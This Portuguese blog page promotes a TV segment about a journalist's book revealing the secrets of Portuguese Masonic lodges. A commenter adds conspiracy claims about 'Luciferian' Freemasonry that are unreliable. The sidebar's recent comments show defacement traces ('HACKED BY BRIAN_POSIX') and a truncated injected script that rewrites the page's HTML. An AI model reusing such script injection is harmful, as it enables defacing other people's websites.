Viajar nas Palavras @ 18:32

Seg, 28/01/13

Em “Segredos da Maçonaria Portuguesa” conta-se as histórias dos pedidos de favores maçónicos a Paulo Portas e os convites do GOL e da GLLP/GLRP a Pedro Passos Coelho e António José Seguro. Mas também a revolta maçónica contra o gestor António Mexia, a iniciação de Isaltino Morais, a festa maçónica com o cantor-imitador Fernando Pereira, o episódio do mestre maçon que mudou de sexo e todos os pormenores da sessão em que Nuno Vasconcellos foi eleito venerável da Loja Mozart.

 

Nesta investigação inédita, o jornalista António José Vilela, que há mais de dez anos investiga este tema, desvenda por completo os segredos das duas maiores correntes maçónicas portuguesas, o Grande Oriente Lusitano (GOL) e a Grande Loja Legal de Portugal/Grande Loja Regular de Portugal (GLLP/GLRP), o seu poder e a sua influência na sociedade e no mundo da política nacional. Através dos próprios documentos secretos internos maçónicos, reproduzidos nesta obra, ficamos a saber como são feitas as iniciações de novos membros, quem guarda os livros dos maiores segredos da Irmandade do Bairro Alto, quais são os sinais secretos usados entre maçons e como funcionam os principais órgãos da maçonaria.

 

Conhecemos ainda o vasto património da maçonaria, quem são os maçons eleitos para o Parlamento do GOL, o que dizem as atas confidenciais das sessões, onde, entre outros assuntos, já se votou a criação de serviços de inteligence e as ligações do espião Jorge Silva Carvalho aos altos graus da maçonaria e ao atual ministro Miguel Relvas. Hoje, há maçons em todos os distritos de Portugal.

 

E quando um novo membro é recrutado para o GOL, os irmãos exigem-lhe que identifique por escrito quais são os seus inimigos. Porventura, o seu nome já lá está…

 

Não perca estes e muitos outros segredos, no Mais Mulher desta terça-feira, às 17:30, na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 

 



Blog AntiNOM @ 04:18

Sex, 01/02/13

 

Interessante, mas pena que ele não toca nos pontos que a maçonaria realmente não gosta que falem. Sobre as ligações luciferianas da maçonaria, dito pelos próprios escritores maçóns:

Vamos citar aqui uma frase dita por um dos mais conhecidos entre os maçons em seu livro "Albert Pike - Morals and Dogma of the Ancient and Accepted Scottish Rite of Freemasonry - page 819":

"Os simbolos usados na maçonaria ou parte deles são mostrados aos iniciados e são intencionalmente mal ensinados para falsas interpretações. Não é intencionado que eles (iniciados) os compreendam, mas é intencionado que eles imaginem de outra forma" (OBS: nesta parte "... mas é ..." não consegui tirar da tradução uma construção melhor que assemelha a isso).

"Há sempre um local comum de interpretação das massas dos iniciados dos símbolos que são eloquentes para os adeptos"

http://forum.antinovaordemmundial.com/Topico-o-poder-da-ma%C3%A7onaria?pid=95143#pid95143

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO